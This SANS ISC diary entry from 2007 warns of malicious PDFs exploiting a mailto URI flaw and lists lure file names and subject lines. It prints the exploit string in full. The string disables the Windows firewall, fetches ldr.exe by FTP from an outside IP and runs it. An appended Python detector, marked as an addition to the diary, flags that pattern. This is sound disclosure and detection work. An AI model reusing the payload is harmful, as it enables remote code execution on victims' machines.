SANS ISC: InfoSec Handlers Diary Blog



PDF mailto exploit documents in the wild

Published: 2007-10-23
Last Updated: 2007-10-24 00:18:25 UTC
by Adrien de Beaupre (Version: 2)

The vulnerability initially reported here http://isc.sans.org/diary.html?storyid=3406, confirmed here (with a workaround) http://isc.sans.org/diary.html?storyid=3477, and patched here http://isc.sans.org/diary.html?storyid=3531 now appears to have been spotted in the wild. Proof of concept code had already been released, and a number of people have reported receiving PDFs that exploit the vulnerability. Obviously please patch, apply the workarounds, and/or ensure you can detect and block the exploit. File names seen so far are "BILL.pdf" and "INVOICE.pdf".

Thanks Juha-Matti!

Update 1

The current exploit seen follows this format (spaces added so anti-virus won't trigger):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

Essentially it disables the Windows native firewall with netsh, writes an FTP script that downloads ldr.exe, and executes it. Gotcha.
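For those who want to detect this pattern rather than rely on a signature, here is an added example (not part of the diary, and not ISC code) that pulls every /URI string out of a raw PDF and flags the mailto-to-cmd.exe shape described above. The two sample objects are constructed for the example, with a harmless placeholder in place of the real command chain; it only handles literal-string URIs, not hex strings or compressed object streams.

```python
import re

# Constructed sample PDF fragments (not real malware): a benign mailto link
# and one shaped like the exploit above, with a harmless placeholder command.
BENIGN = b"5 0 obj<</Type/Action/S/URI/URI(mailto:support@example.com)>>endobj"
SUSPECT = (b"5 0 obj<</URI(mailto:%/../../../../../../Windows/system32/cmd\".exe\"\""
           b" /c /q @echo off&echo PLACEHOLDER)/S/URI>>endobj")

# Literal PDF string after /URI: honours backslash escapes, stops at the first
# unescaped ')'. Hex strings (<...>) and object streams are out of scope here.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^)\\])*)\)", re.DOTALL)

def uri_actions(pdf_bytes):
    """Return every /URI(...) literal string found in the raw PDF bytes."""
    return [m.group(1) for m in URI_RE.finditer(pdf_bytes)]

def suspicious_reasons(uri):
    """Heuristics for the mailto handler abuse; returns the reasons that fired."""
    u = uri.decode("latin-1").lower()
    reasons = []
    if not u.startswith("mailto:"):
        return reasons                      # only the mailto handler path is covered
    if "%" in u.split("?", 1)[0]:           # % in the address part, as in the sample
        reasons.append("percent in mailto address")
    if "../" in u or "..\\" in u:
        reasons.append("directory traversal")
    if re.search(r'cmd(".|\.)exe', u) or "/system32/" in u or "\\system32\\" in u:
        reasons.append("references cmd.exe or system32")
    if "&" in u and any(k in u for k in ("netsh", "ftp ", "echo ")):
        reasons.append("chained shell commands")
    return reasons

def scan_pdf(pdf_bytes):
    """Pair each URI action with the heuristics it triggers; [] means clean."""
    return [(uri, suspicious_reasons(uri)) for uri in uri_actions(pdf_bytes)]
```

Anything that returns a non-empty reason list for a mail attachment named like the ones above deserves quarantine and a look at the mail gateway logs for the sender.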

Additional file names: "YOUR_BILL.pdf" and "STATEMET.pdf". Some subject lines have been "INVOICE alacrity", "STATEMET indigene" and "INVOICE depredate".

Thanks Bojan!

Cheers,
Adrien de Beaupré
Bell Canada
